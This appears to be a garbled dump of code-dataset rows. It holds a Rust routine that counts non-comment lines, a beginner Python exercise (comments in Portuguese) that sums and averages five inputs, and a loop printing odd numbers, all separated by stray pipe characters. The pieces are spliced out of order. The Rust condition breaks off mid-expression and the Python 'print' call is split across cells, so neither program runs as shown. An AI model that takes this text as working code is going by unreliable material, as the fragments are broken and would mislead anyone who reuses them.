slash:bool,
new_line:bool
}
impl CounterStatus {
fn new()->CounterStatus {
CounterStatus{
counter:0,
slash:false,
new_line:true
}
}
}
fn count(text:&str)->usize{
let mut status = CounterStatus::new();
for c in text.chars() {
if c == '\n' {
status.new_line = true;
}
else if c == '/' {
count_handle_slash(&mut status)
}
else{
count_normal_char(&mut status ,c)
}
}
status.counter
}
fn count_handle_slash(status:&mut CounterStatus) {
if status.new_line {
if status.slash {
status.slash = false;
status.new_line = false;
}
else{
status.slash = true;
}
}
}
fn count_normal_char(status:&mut CounterStatus,c:char) {
status.slash = false;
if c != ' ' && status.new_line |
} | {
status.counter += 1;
status.new_line = false;
} |
Programa que le 5 numeros.py | #Faça um programa que leia 5 números e informe a soma e a média dos números.
cont = 0
s = 0
m = 0
for i in range(5):
n = float(input("Digite nota : "))
s=s+n
cont=cont+1
m=(s)/cont
print(s)
print(m)
'''
'''
# 4)
i = 0
while i < 50:
if (i % 2) == 1:
prin | i=i+1
| t (i)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.